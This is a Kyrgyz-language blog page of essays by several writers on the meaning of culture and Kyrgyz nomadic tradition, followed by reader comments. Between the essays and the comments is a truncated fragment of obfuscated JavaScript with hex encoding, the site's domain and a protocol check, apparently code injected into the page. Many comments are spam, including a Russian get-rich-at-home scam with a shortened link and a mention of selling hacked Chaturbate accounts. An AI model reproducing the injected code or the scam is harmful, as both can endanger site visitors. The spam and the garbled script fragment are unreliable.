Маданият деген эмне?

1-гл фото

Маданияттын нагыз маанисин жана элдин жашоосундагы оордун, ошондой эле анын эмне үчүн зарыл экендигин учурда айкындап-ачып бере турган олуттуу маселе болуп турат. Мындан улам төмөндө Маданият тууралуу берилген ой-пикирлер менен таанышып чыгууга чакырабыз.

                                                                                     Кыргыз маданиятынын өзөгү 

3-Касаболотов

Жыргалбек Касаболотов, конфликтолог

Акыл-эс, билим, абийир жана уят сыяктуу эле – маданият адамды адам кылып турган негизги категориялардын катарына кирет жана алар менен өз ара тыгыз байланышта.

Маданият деп адам баласы өзү чыгарган, бирок негизги максат катары экономикалык пайда көздөбөгөн нерселердин баарын, анын ичинде көркөм өнөрүн, сөз байлыгын, кийген кийиминен тартып жүрүш-туруш эрежелерине чейин баардыгын чогуу түшүнөбүз.

Ар бир улуттун маданияты анын тарыхый-географиялык шарттарына, басып өткөн жолуна, дүйнө таанымына жана башка ар кандай жагдайларга көз каранды. Демек, ар бир элдин маданияты анын ички маңызын, дүйнөгө болгон көз карашын жана мамилесин туюндурат.

Көчмөн цивилизация кылымдар бою басып өткөн салттуу коомдо маданияттын өзгөчө түрү өнүгүп жүрүп отурган. Көчмөн баласы дүйнөнү конкреттештирүүдөн жогору көтөрүлүп чыгып, айлана-чөйрөнү абстракттуу жалпылаштырып, материалдык байлыкты руханий дөөлөткө баш ийдире билген. Анысы карама-каршылыктуу, бирок өз ара гармониядагы түстөрдү айкалыштырып кайра астына салып алган шырдак өнөрүнөн, күнүмдүк күпүйүм оокатты сүрөттөбөй,  “Дүнүйө” деп күңгүрөнгөн терең философиясынан, ай-ааламды түбөлүк Улуу Кыймылга ширетип көзгө даана элес тарткан “Аккан Суу” термесинен, толтура күүнү боюна сиңирип, колго эптүү жасалгандыктан койнуна баткан комузунан, тарбияга жык толгон санжыра-насаатынан – айтор баардык өңүтүнөн көрүнөт.

Көчмөн маданияттын бир нече белгилери бар. Биринчиси – жандуулугу жана турмуш менен кошо өзгөрүшү. Дүйнө элин таң калтырган “Манаста” жер каймактагандагы Эр Төштүктүн образынан тартып акыркы доордо кирген ислам түшүнүктөрүнө, түтөтмө мылтыктарга чейин кошо жүрөт. Демек, улуу дастаныбыз кыргыз эли башынан өткөргөн негизги көрүнүштөрдүн баарын өзүнө сиңирип жүрүп отурган десек болот. Азыр да ошол процесс жүрүп жаткан учур.

Экинчиси – Батыш, ал тургай кийинки орус таанымындагы түшүнүктөр кыргыз маданиятынын классификациясына туура келе бербейт. Айталык, ошол эле “Манас” башкалар үчүн болгону жөн гана чоң эпос. Ал эми кыргыз үчүн ал маданияттын эмес, көбүнчө касиеттин, жоокердик духтун, элдин эстутумунда калган эң маанилүү тарыхый тажрыйбанын, жарандык идеалдын маселеси. Айтыш – отурук элдер үчүн эки акындын гана сөз таймашы болсо, кыргыз үчүн бул сөз эркиндигинин өзгөчө формасы. Айтылуу Калыгул кийинки доордогу адабиятчылар үчүн тек гана заманачыл акындардын катарындагы бирөө болсо, кыргыз үчүн биринчи иретте далай элдин маселесин адамгерчилик жана даанышмандык менен чечкен көсөм, алдыны көрө билген олуя болчу. Демек, кыргыз түшүнүктөрүн талдай келгенде, көп учурда формасы менен мазмуну башкалар ойлогондой эмес, таптакыр башка өңүттө чечилет.

Үчүнчүсү – эстутумдун сапаты. Кыргызда көптөгөн кылымдар бою жазуу, дегеле маалыматты фиксация кыла турган каражаттар жок болгондуктан, кыргыз баласынын аң-сезими жана эстутуму биринчиден сыйымдуу, экинчиден өзүнө керектүүсүн гана тез чыпкалап алгыдай ийкемдүү болгон. Төкмөлүк, манасчылык, эл маселесин калыс чечкен чечендик, санжыра-санаттын сыры ушуга барып такалат. Профессор Тайлак Абдылдабеков агайыбыз бул маданиятты ошондуктан “жады маданияты” деп атоону сунуш кылганы бар.

Төртүнчүсү – нукура элдүүлүгү жана турмушка жакындыгы. Кыргызда “Эл” жана “Мамлекет” деген түшүнүктөр эч качан өзүнчө каралбагандыктан, кыргыз маданиятынын багыттары да кандайдыр элитанын гана көңүл ачуу каражаты болбостон, жалпы элдин сынында болгон. Элдин сыны, калктын кызыкчылыгы, руханий тажрыйбасы баарын таразалап, тазалап, иргеп жүрүп отурган. Көкөлөп кадимки турмуштан алыстап кетишине, чычайып чындыктан оолакташына, түшүнүксүз түр күтүшүнө жол берген эмес.

Бешинчиси – Жолду сактаганы, Жолдон чыкпаганы, дегеле Жол түшүнүгүнүн ыйыктыгы. Кыргызда сөздү бийик баалап, сөзгө жыгыла билген, чыгармачыл маданиятта да, жүрүш-туруш маданиятында да улуунун улуудай, кичүүнүн кичүүдөй, эркектин эркектей, аялдын аялдай орду, Жолу болгон. Ырдын уйкашы, оюунун кыюусу, обондун ыргагы – ошонун баары кыргыз кыртышына жакын, канына сиңген баалуулуктарга шайкеш болгон.

Кеңеш доорунда кыргыз маданияты орусташуу, отурукташуу, шаарлашуу сыяктуу бир топ сыноого дуушар болсо да, негизги өзөгүнөн алыстабай, бир катар мыкты ачылыштарды тартуулады. Залкар жазуучубуз Түгөлбай Сыдыкбеков кыргыз маданиятын миңдеген жылдар бою катылып жатып, кеңеш доорунда өсүп чыккан мыкты үрөнгө салыштырганы бар. Абдан таасын мындай салыштыруу азыр да өз баасын жогото элек. Анткени, кеңеш доору чын эле кыргыз маданиятынын мыкты үлгүлөрүн дүйнөгө жаңыча өңүттө алып чыкканын эч ким тана албайт.

Бирок кыргыз эли, кыргыз баалуулуктары сыяктуу эле, кыргыз маданияты да эң чоң, опурталдуу сыноону так ушул азыркы мезгилде башынан кечирүүдө. Салттуулуктун жана ырааттуулуктун кедери кетип, таптакыр башка кыртыштан тамыр алган массалык маданияттын каптап кириши, дүйнөлүк ири геосаясий борборлордун атайылап тийгизген руханий таасири, дүйнөлөшүүнүн эпкини кыргыз маданиятынын өзөгүн сактоо маселесин кабыргасынан коюуда.

Арийне, ал бир макаланын чегиндеги эмес, көптөгөн багыттагы адистер менен чогуу-чаран талкуулана турган нерсе.

                                                             Маданият – мурасталган тартиптердин Мыйзамы

Безымянный

Абдымамбет САРИЕВ, жазуучу

Кыргыздын улуттук маданияты негизинен эки бөлүктөн турат:

1. Ички маданият

2. Тышкы маданият

Бул экөө тең кыргыздын улуттук каада-салтынын, үрп-адатынын эреже, жол-жоболорун жетекчиликке алып, ар бир чейрек же жарым кылымда замандын өзгөргөн тартибине ылайыкташып, ар бир муунду негизги өзөгүнөн ажыратпай, мурдагы маанисин сактап калып, жаңы өзгөрүүлөрдү ылайыгына жараша кошуп жүрүп отурат да, жалпы кыргыз элин тарбиялап, жол көрсөтүп, улуттук өзүнчөлүктү жана                                                                      өзгөчөлүктү сактап турат.

Ички маданият деген – бул ар бир кыргызды улуусунан кичүүсүнө, аял-эркегине карабай байыркы ата-бабалардан калган жүрүш-туруш адебин, бири-бирине мамиле жасоо адебин, тамак ичүү адебин, кийим кийүү адебин, сөз сүйлөө адебин, эмгектенүү адебин, отуруп-туруу адебин, ата-энеге мамиле жасоо адебин, аял менен эркектин ортосундагы мамиле адебин, улуу-кичүү адебин, дос-душман адебин, тууган, куда-сөөк адебин, коңшу, айылдаш адебин, уруу (урук) адебин жана башка күндөлүк жашоо-тиричиликте кездешип туруучу адеп мамилелерин жөнгө салган эрежелерди ичине камтып, атадан балага, энеден кызга, улуудан кичүүгө мурасталып келген тартиптердин Мыйзамы болуп эсептелет.

Тышкы маданият деген – бул жалпы кыргыз элине таандык улуттук өзгөчөлүктү билдирип турган кулк-мүнөздү калыптандырууга тарбиялоо адеби, өнөргө үйрөнүү адеби, элдик музыкалык аспаптарды сактоо жана колдонуу адеби, Манасты ыйыктоо адеби, жан-жаныбарларга аңчылык кылуу адеби, жылкы, куш, тайган үйрөтүү жана сактоо адеби, узчулук жана устачылыктын сырын өздөштүрүү жана ага мамиле жасоо адеби, жоокердик духтун адеби, башка элдер менен мамиле түзүүдө өзүн алып жүрүү адеби, душман элдер менен сүйлөшүү адеби, дос элдер менен сүйлөшүү адеби, эл-жерди сактоо маселесинде бир тартипке баш ийүү адеби, от, суу, тоо, таш, жан-жаныбар, өсүмдүк-дарак ж.б. жаратылыштын байлыктарын ыйык сактоонун жолун үйрөтүү адеби, Ата-Журтту ыйыктоо адеби, башка элдер менен бирге тамак ичүүдө улутту уятка калтырбоо адеби жана башка ушул сыяктуу адептердин жыйынтыгын чыгарып, күндөлүк жашоо-тиричиликтен тышкаркы жалпы улутка тиешелүү Адептерди ичине камтыган эрежелердин жыйындысы болуп эсептелет.

Кыргыздар дал ушул Ички жана Тышкы маданияттын эрежелерин колдонуп жана ага баш ийип, кыргыздын улуттук каада-салтынын, үрп-адатынын эреже, жол-жоболорун Ички жана Тышкы маданиятка айкалыштырып, жок болуудан, бузукулуктан, адашуудан алыс болуп, кылымдан кылымга өз алдынчалыгын жоготпой жашап келишкен.

                                                        Бийик маданият көлөкөдө калууда

3-Замир Ы

Замир ЫМАНКАЛИЕВ, “Ак Шумкар КУТ” жаштар коомдук бирикмесинин мүчөсү

Маданият – кайсы бир улуттун кулк-мүнөзүн (менталитетин), каада-салтын, нарк-насилин, үрп-адатын, уз-чеберчилигин жана өнөр-чыгармачылыгын камтыган руханий тереӊ түшүнүк же башкача айтканда бир улутка таандык жашоо образы деп айтсак болот.

Анткени, турмушта маданияттуу жүрүм-турум, өнүккөн маданияттуу коом жана  маданий өнөр-чыгармачылык деген түшүнүктөр калыптанган. Ошондуктан улуттун улут катары сакталып калышы – улуттун маданиятынын өнүгүшүнөн көз каранды.

Өнүккөн маданият – руханий өнүккөн коомду; коом – бир улутту түзөт. Тилекке каршы, бүгүнкү ааламдашуу доорунда коомчулук маданиятты цивилизация жана дин түшүнүктөрү менен чаташтырып, чоӊ жаӊылыштык кетирип жатат. Өзүбүздүн маданиятыбызды өзүбүзгө жат көрүнүш катары баалагандар четтен чыгууда. Кийинки учурларда маданиятты шоу-бизнес менен алмаштырып да калышты.

Маданияттын баркын түшүрүп, кунун кетирип жаткан чала-чыгармачыл, атак-даңкка тойбогондор бүгүн өздөрүнүн деңгээли менен маданиятты жерге чаап жатышат. Бул сын эмес, бул кадимки биз күнүгө күбө болуп жаткан көрүнүштөр.

Ал эми бийик маданияттуулук жана сапаттуулук – жалтырактанган арсыздыктын, шөкөттөлгөн менменсинүүнүн көлөкөсүндө калууда. Ушул өкүнчтүү деп ойлойм.

                                                                  Салттуу маданият – элдин күчү

4-Айбек

Айбек БАЙЫМБЕТОВ

Маданиятты белгилүү бир түшүнүккө сыйдырып салуу мүмкүн эмес, анын чеги эркин таркап кеткен.

Бирок, маданияттын түшүндүрмөлөрүнүн көп түрдүүлүгүнө карабастан, анын өзөктүү багытынан адашпаган озуйпасы бар экени белгилүү. Эгер ошондон улам алып карай турган болсок, анда бүгүнкү күндө анын орду жана мүмкүнчүлүгү тууралуу учкай сүртүмдөрдү жасап кетүүгө  болот.

Маселен, бүгүнкү күндө маданиятка кайрылып жатканыбыздын башкы себеби, бул системалык кризис учурунда көз менен көрүп, акыл менен туя албай турган кезде, айласыздан карбаластап барып кармай турган нерсебиз маданият болууда. Интуитивдик деңгээлде туура тандоо болуп жатканы менен, улуттук маданиятыбызга карай өзүбүздү толук кандуу жөндөй албай келебиз. Мындай учурда маданият жалпыга бүкүл бойдон, сырткы көрүнүш катары кабылданып, анын нагыз ички мазмуну ачылбай калат.

Улуттук  маданият жалпыдан ар бир адамга жеке түрдө келип, кайра жалпыга карай жеке руханий өндүрүм болуп тарайт. Бул кыймыл элдин жашоосунда башкы аныктооч катары, же болбосо тарыхый-тагдырды бере турган дарамет болуп саналат. Биз эл катары тагдырыбызды өзүбүздүн колубузга өзүбүз тапшырык кылуу сааты учурда тарыхый момент боло тургандыгын көпчүлүк сезип турат. Мындай учурлар элдин жашоо жолунда белгилүү бир убакыттарда пайда боло турган мыйзам-ченемдүү көрүнүш.

Ушул чек кайсы бир элдин кийинки кылымдарга бар же жок боло тургандыгын аныктайт. Ушул чек – элдин улуттук күчүнө анык сыноо. Ал эми элдин күчү же улуттук эрк эмнеден көз каранды? Албетте жеринини кеңдигинен же болбосо эсепсиз малдын санынан эмес,   маданиятынын потенциалынан көз каранды. Маданият – бул элдик дух. Ал эми жаны болсо – өтүп жаткан жашоо. Каны болсо – мамлекеттик түзүлүш. Кан бузук болсо, жашоо сапатсыз, дымак жетишсиз. Бирок эгер элдик дымак көтөрүлсө, дем-кубаты топтолсо, баардыгы дароо өзгөрө тургандыгын жакшы билебиз. Биздин милдетибиз – элге жарык чачуу.

Азыр элдин жалпы маданий климаты бузулган, саясый-экономикалык реформа эмес, коомчулукка адегенде интеллектуалдык жана моралдык реформа жүргүзүү зарыл болуп турат. Кыргыз элинин чыгармачыл потенциалын жана аны менен бирге  жаӊы тарыхый өнүгүү этабына элдин күчүн мобилизациялай турган бирден бир  күч – бул салттуу маданият. Ансыз кыргыз элинин жашоо кыймылын, рух тирүүлүгүн элестетүү мүмкүн эмес.

Салттуу маданият – бул адамдардын акыл-эс дараметин, аӊ-сезимин жогорку түшүнүктөгү деӊгээлге чыгара турган бийик реалдуу ырааттуулук. Маданияттын жолу туруктуу жана түбөлүк. Ал эми дин менен идеологияны камтыган цивилизациянын жолу туруксуз жана убактылуу. Маданияттын өзөгүндө бийик гумандуулук жатат жана ага адам табиятынын асылдыгы чөгөрүлгөн. Ошондуктан маданияттын чеги жок жана ал эч качан көз каранды болушу мүмкүн эмес.

Бир убакта жаралган маданияттын жашоосу цивилизациялык өнүгүүнүн көлөкөсүндө калып жоголушу мүмкүн, бирок табигый негизи күчтүү болгондуктан,  жашоого тийгизген таасирин, тамырын жоготпойт. Качандыр бир кезде эски урандылардын астынан жаӊы жашоо кайрадан жарала берет. Жерди жарып оргуштап аккан булак сыяктуу, маданият адамдын акылы менен табият мыйзамын бир шайкештикте жууруп, таза асылдыкты коомдук мамилеге эреже кылып берет.

Маданият – табигый түрдө, таңууланбаган жашоо чындыгы менен жарала турган элдик символ. Анын тамыры адамдын түшүнүгүндө жана руханий жетилгендигинде уюп жатат. Жыйынтыктап айтканда, коомду жаңыртуу жеке ар бир адамдын абийири менен келе турган маселе. Элдин өнүгүү башатында руханий-маданий ишмердүүлүк турганда гана коом адилеттүү теӊ салмактуулукка жетет.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

37 thoughts on “Маданият деген эмне?

  1. Философиялык категория турундо карасак: -“Маданият, -бул адамдын ички дуйносу менен сырткы дуйносунун тен салмагын кармап турган, кунумдук турмушта колдонуучу эрежелер, урп адаттар”. Демек, кунумдук турмушубузда колдонгон нерселердин баары, адамдын ички дуйносу менен сырткы дуйносунун тен салмагын кармап туруу керек. Мындан, турмушта колдонулган нерселердин баардыгынын маданияты болуш керек:
    – Соз маданияты;
    – Журуш-туруш маданияты;
    – Билим маданияты;
    – Илим маданияты;
    – Искусство маданияты;
    – Ондуруш маданияты;
    – Бизнес маданияты;
    – Чыгармачылыктын маданияты;
    – Массалык маалымат каражаттарынын маданияты;
    – Саясат маданияты; жада келсе Дин маданияты болуш керек.
    Турмушта колдонгон баардык нерселер адамдын ички дуйносу менен сырткы дуйносунун бутумдугун кармап туруш керек. Мына ошондо кана адамзат цивилизациясында дуркурогон онугуу башталат!

  2. Маданият – адамзаттын руханий, коомдук,ондуруштук жана илимий-техникалык жетишкендиктеринин денгээлин камтуучу кенири тушунук. Ар-бир улут, улут катары сакталып жана осуп-онугуп кетиши учун, озунун улуттук маданиятын коздун карегиндей сактап,онуп-осушуно кам коруш керек. Улуттун жаны маданият,маданиятын жоготкон улут олот.Оз маданиятын билбеген кыргыз, кыргыз эмес, ал уруусу да,улуту да жок адам.Биз,кыргызды кыргыз кылып сактап келген асыл-ыйык баалуулуктарыбызды сактап, маданиятыбызды заманга жараша остуруп-онуктуруп турушубуз керек.Эч бир кыргыз башка мамлекетте кыргыз болуп сактала албайт.кыргыз кыргызстанда гана кыргыз болуп жашай алат. Кыргызды кыргыз гана суйот,кыргызга кыргыз гана куйот. .Суйуктуу кандаш туугандар биздин кыргыз болуп сакталып калышыбыз учун Кыргыз мамлекетибизди сакташыбыз керек.Мамлекетти сакташ учун бизге ынтымак керек,ынтымак болуш учун Улуттук идеология керек.Улуттук идеология кыргыздын асыл-ыйык баалуулуктарына негизделип улутубуздун замандын талабына жараша кайра жаралуусуна шарт тузуусу керек. Улуттук идеология менен диндин эч кандай байланышы жок. Дин жеке адам менен кудайдын ортосундагы акреттик мамиле., Улуттук Идеология улуттун маданиятына таянып улутубузду жана мамлекетибизди сактоо учун жол корсотуп кызмат кылат.

  3. Маданиятты каада салт жана үрп адат менен алмаштырбагыла!
    Маданият – жүрөктөгү ыйык сезимдер.
    Ыйык деп төмөнкү сезимдерди айтсак болот: КУБАНУУ, СҮЙҮНҮҮ, СҮЙҮҮ, АЁО, НАМЫСТАНУУ, УЯЛУУ, МЭЭРИМ ТӨГҮҮ, ӨКҮНҮҮ, КАЙГЫРУУ жана башка ушул сыяктуу адамды жакшы жолго салуучу сезимдер.
    Маданияттуу деп жүрөгүндө ыйык сезимдери көп болгон адамды айтат,себеби ичиндеги ыйык сезимдери башкача айтканда маданияты ага жаман иштерди жасатпайт.
    Мисалы:Адам уурулук жасайын десе УЯЛУУ, АЁО, АТА МЕКЕНДИ СҮЙҮҮ сезимдери тоскоол болушат,эгер кокус уурдаган болсо ӨКҮНҮҮ, КЕЙҮҮ, КАЙГЫРУУ, УЯЛУУ сезимдери ал адамды экинчи андай ишти жасабоосуна жана уурдалган нерсени кайра алып барып коюуусуна көмөктөшөт.
    Ал эми акын-жазуучулар, ырчы-чоорчулар, бийчилер, актёрлор, музыканттар чыгарма жаратуу же аткаруу аркылуу адамдарга тарбия беришип,кандайдыр бир ыйык сезимдерин,башкача айтканда маданиятын ойготууга аракеттенишет, ошол себептен аларды маданият кызматкерлери деп аташат.
    Негизи жүрөктө миңден ашуун ыйык сезимдер бар.Алардын баарысын болбосо да көпчүлүгүн иштетип,заманыбыздын маданияттуу адамдары бололу.одноклассниктен мени издеңиздер!

  4. I was more than happy to uncover this site. I need to to thank
    you for your time just for this fantastic read!! I definitely loved every little bit of it and i also have
    you bookmarked to see new stuff on your website.

  5. Биз дайыма Кыргыз элинин улуу мурасы катары Манасты тааныйбыз, бул туура болот, отурукташкан эл катары Акропольдой, жакынкы Самарканд, Бухарадай архитекуура мурастары болбосо да кочмон элдердин ооз эки мурастары тарыхий тендике тен келет. Бирок Манастын Каганаттык башкаруу улгусун алсак биз бул жолдон алыспыс. Каганат камтыган аскердик доолот, аскердик тартип, мекенчилдик, эл журтуна кайрымдуулук ишмерчилиги соз бойдон калып кележатат буга 27 жылдан бери келе жаткан терс корунучтор. Биздин мамлекет аскердик башкаруу жолуна конул болушубуз керек. Азыркы айтып жургон менеджмент-башкаруу деген илимий негзи бул герман аскеринин, жана жапон аскеринин сыпаттары конулго алынып ишке киргизишкен. Биздин колубузда турган нерсени коро албай жатабыз.

  6. перекос балконной пластиковой двери
    классические двери межкомнатные

    http://dveridomzamok.icu

    врезные дверные ручки
    купе фурнитура для межкомнатных дверей
    металлические двери металюкс стандарт

  7. Please provide as much advice as you can, when submitting a 2257 report or
    a DMCA. Work little or as much as you desire.  Recreational activities and hobbies may work wonders in this period.
    They’ll also aid you in avoiding pitfalls that chances are you would hit on each one of
    them if you went with your eyes closed into this area.
    BOT) to play readings and medium the room so that just one person can share at one time.
    On some forums you’ll be able to discover hacked Chaturbate accounts to sell credits that are whit on them.
    We offer them complete freedom to utilize our chat room talk and to locate with new
    chatters online anytime and from anywhere. Literotica doesn’t use pop-up ads everywhere on the site.
    CamStumble was plain a video chat site where you
    could press against stumble and get attached to a random
    individual visiting the website. Don’t hesitate to make details about Narcotics Anonymous (like this web
    site) available to other people.

  8. Please let me know if you’re looking for a writer for your blog.

    You have some really great posts and I think I would
    be a good asset. If you ever want to take some of the load off, I’d
    love to write some material for your blog in exchange for a link
    back to mine. Please blast me an e-mail if interested.
    Thank you!

  9. Hey terrific blog! Does running a blog similar to this require a lot of work?
    I have virtually no expertise in computer programming
    but I had been hoping to start my own blog soon. Anyway, if you have any recommendations or techniques for new
    blog owners please share. I know this is off subject nevertheless
    I just needed to ask. Many thanks!

  10. Everything posted made a lot of sense. However, what about this?

    suppose you wrote a catchier title? I ain’t suggesting
    your information isn’t solid, but suppose you added a
    headline that grabbed folk’s attention? I mean Маданият деген эмне?
    | Көк асаба is a little boring. You could look at Yahoo’s front page and note how they write news titles to
    get people to open the links. You might add a related video or a related pic or two to grab people excited about everything’ve got to say.
    In my opinion, it would bring your posts a little bit
    more interesting.

  11. Я больше 2-х часов искал в интернете сегодня и не мог найти ни одной позновательной статьи, как ваша.
    Мое мнение, если бы все копирайтеры так замечательно писали статьи, как
    вы интернет стал бы намного интереснее.

  12. Everything published made a ton of sense. However, think on this, what if you wrote a catchier title?

    I ain’t suggesting your content is not solid, but what if
    you added a title that makes people desire more? I mean Маданият деген эмне?
    | Көк асаба is kinda vanilla. You could peek at Yahoo’s home
    page and note how they create post headlines to grab people to
    open the links. You might add a video or
    a related pic or two to get readers interested about
    what you’ve got to say. In my opinion, it
    could bring your posts a little bit more interesting.

  13. A: The side effects of Lioresal Intrathecal can include drowsiness, lightheadedness, dizziness, nausea and vomiting, low blood pressure, headache, seizures, and loose muscles.

    The most popular of the cardiovascular drugs used to prevent migraine headaches are Inderal, Depakote and Sansert.

    science project for student

    Working faster and communicating valve system is bright light then be given as an irreversible ischaemia and nearly impossible to surgical assistance you to swim for replacements are unaffected.

    First lets define this: antidote: a remedy to counteract the consequences of poison.

    fktrpr94f
    Overall, the unpredictability of these OTC sleep aids’ efficacy just goes to show why they’re better off used as they were originally intended for i.e.

  14. Hello, I’m Rufus.
    Welcome to my homepage . I started writing in high school after a creative writing assignment for my English teacher. I did creative writing for almost a year before I thought about doing something else.
    I had always loved doing non-fiction writing because I’m passionate about learning. When you combine writing talent with a love of learning, dissertation writing only makes sense as a job.
    I’m passionate about aiding the students of the future in their school career. When they don’t have time for their paper , I am there to help.

    Rufus Laing – Writing Expert – http://www.technlogyreview.com Corps

  15. Подрýгµ хвácтáютcя зápaбòтком мýжa? Пòхвacтaй свòµмµ дохòдaмµ!
    Это реальные деньгù! Ты получишь их всего за месяц! Нùкаκого развода, ниκаκого сетевого маркетµнга — это работа на себя, не выходя ùз дома. Забрать деньгµ
    https://is.gd/eVGXkc

  16. I do not know if it’s just me or if everybody else experiencing problems with your blog.
    It appears as though some of the written text
    in your posts are running off the screen. Can somebody else please comment and let me know
    if this is happening to them too? This might be a issue with
    my internet browser because I’ve had this happen before.
    Kudos

  17. I have been exploring for a little bit for any high quality articles or blog posts on this sort of space .

    Exploring in Yahoo I at last stumbled upon this web site.
    Reading this information So i am satisfied to exhibit that I have a very excellent uncanny feeling I discovered exactly what I needed.
    I most unquestionably will make certain to don?t overlook this website
    and provides it a glance on a relentless basis.

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *